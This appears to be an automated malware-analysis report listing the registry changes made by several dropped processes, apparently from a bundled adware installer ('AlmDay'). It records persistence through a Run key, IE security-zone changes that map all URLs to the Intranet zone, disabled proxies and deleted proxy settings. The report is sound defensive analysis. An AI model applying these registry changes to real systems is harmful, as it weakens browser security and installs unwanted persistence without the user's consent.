[HKCU\Software\AlmDay]
"InstallPath" = "%Documents and Settings%\%current user%\Application Data\AlmDay"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"DisplayName" = "½ñÈÕ»ÆÀú 2.0.3 Õýʽ°æ"
"DisplayVersion" = "1.0.6.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\AlmDay]
"AppFilePath" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"URLInfoAbout" = "http://www.wangren123.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\AlmDay\Uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"AppUninst" = "-unreg"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 EE 5E D4 E5 C3 99 18 EF EA B6 89 B4 F5 34 C7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"AppPath" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\AlmDay]
"AlmDay.exe" = "今日黄历 应用程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AlmDay" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe /start"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process IFoxInstall-y-c203945859-run-s-x.exe:1360 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 87 7C 5E 25 3D 63 86 B8 32 D8 C3 39 05 65 94"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process AlmDay.exe:1016 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\AlmDay]
"AlmDayQuick.exe" = "今日黄历辅助进程 应用程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 5C 9E 60 84 6F C7 77 9D CA C7 DB 25 64 48 EB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process assistupdate.exe:2660 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F C3 F6 E5 67 3E 74 66 B7 D2 3C 5B C2 FB AD 27"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process setup_2948-140896.exe:1164 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\FM4.0\201409180317]
"FHSev.exe" = "音乐通用检测报告"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 AA A8 FF F3 87 20 33 10 D6 06 52 0C 79 6A CE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process axult.exe:460 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 51 F9 8F C4 41 FB 29 07 17 C0 0B 8A 8B 06 78"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:264 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 1B 6D 18 2F 85 64 8E A3 12 BB EE 9F 15 27 2F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\WinRAR SFX]
"C%%Program Files%fjwyusp" = "%Program Files%\fjwyusp"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"fjwyusp.exe" = "fjwyusp"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process AppleDesktop.exe:1952 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 54 36 A6 55 A4 46 CF FD CD A2 09 D1 68 B1 70"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-22915" = "Contains the files and folders that you have deleted."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

Proxy settings are disabled:

